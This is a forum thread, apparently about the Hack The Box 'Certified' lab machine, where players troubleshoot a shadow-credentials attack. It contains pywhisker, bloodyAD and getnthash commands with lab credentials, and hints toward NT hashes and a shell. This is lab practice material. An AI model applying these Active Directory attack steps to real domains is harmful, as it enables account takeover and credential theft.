Official Certified Discussion

I can't get the NT, my pywhisker is getting this error:
./pywhisker.py -d "certified.htb" -u "judith.mader" -p 'judith09' --target "management_svc" --action "add"

[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: dade21ea-a6e6-e6b9-022c-05b8277cd7e8
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[!] module 'OpenSSL.crypto' has no attribute 'PKCS12'

I tried certipy and was able to get the ccache. When I merge the ccache and the key that I found using pywhisker, I got this other error:
…/getnthash.py certified.htb/management_svc -key fbd9abd5fc84d49b86fddabb5d5cc94f4498eee06b4e768ac3fcd2d59c15a2eb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
[-] ciphertext integrity failure

Did you get a valid pfx? Certipy should not be used in this step

No, pywhisker shows this error but adds the key. I don't know why. It breaks before showing the pfx.

I wrote before there is another tool to perform the add task, check the previous comments


You need to add judith in the group

After getting a key with bloodyAD and gettgtpkinit I receive the same error:
…/getnthash.py certified.htb/management_svc -key fbd9abd5fc84d49b86fddabb5d5cc94f4498eee06b4e768ac3fcd2d59c15a2eb

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
[-] ciphertext integrity failure

Any idea how I should proceed after getting the key?

PM me

This worked for me: PyOpenSSL has removed deprecated PKCS12 breaking --shadow-credentials in ntlmrelayx.py · Issue #1716 · fortra/impacket · GitHub

pip uninstall pyOpenSSL asgiref
sudo apt-get remove python3-asgiref
pip install asgiref==3.7.2
pip install pyOpenSSL==22.1.0 mitmproxy-rs==0.5.1 urwid-mitmproxy==2.1.1
pip install --upgrade impacket

I got the NT hash, but I can't remotely control the machine. There's no WinRM port.

The port 5985 is filtered.

Thanks to @Yovecio18, I got the shell.

Try switching your VPN to EU Release arena. You will get the shell if your NTLM hash is right.

Learned a lot with this box!! Finally PWNED IT!! Please feel free to DM me if someone needs help… Happy to help

This still did not work, but I am glad that I am not the only one having issues here. I have tried numerous methods; I am getting an LdapAttributeError when running targetedKerberoast and then a name logger error when running pywhisker.

You are not the only one

Please can I have help?

Struggling with the initial foothold, any hints?

You should have the credentials needed for initial enumeration. In case you missed it, kindly refresh the Hack The Box page. You should see it at the top.

PS: If you are not using it already, kindly use the Release Arena VPN!


Sure, DM me please…

No no, the steps mentioned by @Catakan1337 about pywhisker work. It worked for me. Kindly check the arguments that you used in the command. Also, a hint: you don't need to use targetedKerberoast here…


Managed to have pywhisker working and got a couple of NTLM hashes, now how do I connect?